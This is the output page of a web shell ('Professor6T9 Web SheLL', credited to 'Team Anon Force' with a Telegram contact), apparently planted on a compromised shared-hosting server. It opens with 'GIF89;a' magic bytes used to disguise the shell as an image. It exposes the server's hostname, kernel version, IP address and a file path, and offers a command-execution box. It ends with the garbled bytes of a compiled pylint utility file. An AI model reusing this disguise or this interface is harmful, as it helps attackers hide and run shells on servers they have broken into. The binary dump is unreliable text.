GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
pylint
/
config
/
_pylint_config
/
__pycache__
[ HOME ]
Exec
Submit
utils.cpython-311.pyc
� � h� � �F � d Z ddlmZ ddlZddlmZ ddlmZ ddlm Z ej dk rddlmZ nddlmZ ej d k rdd lm Z ndd lm Z e d� � Z e dee� � Zh d �Zh d�Z G d� de� � Zd d�Zed!d�� � Zed"d�� � Zd#d�Zd$d�ZdS )%z&Utils for the 'pylint-config' command.� )�annotationsN)�Callable)�Path)�TypeVar)� � )�Literal)r � )� ParamSpec�_P� _ReturnValueT> �i�t�ini�toml> �n�y�no�yesc �$ � � e Zd ZdZd � fd �Z� xZS )�InvalidUserInputz(Raised whenever a user input is invalid.�valid_input�str�input_value�args�object�return�Nonec �P �� || _ || _ t � � j |� d S )N)�valid�input�super�__init__)�selfr r r � __class__s ��s/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/pylint/config/_pylint_config/utils.pyr# zInvalidUserInput.__init__"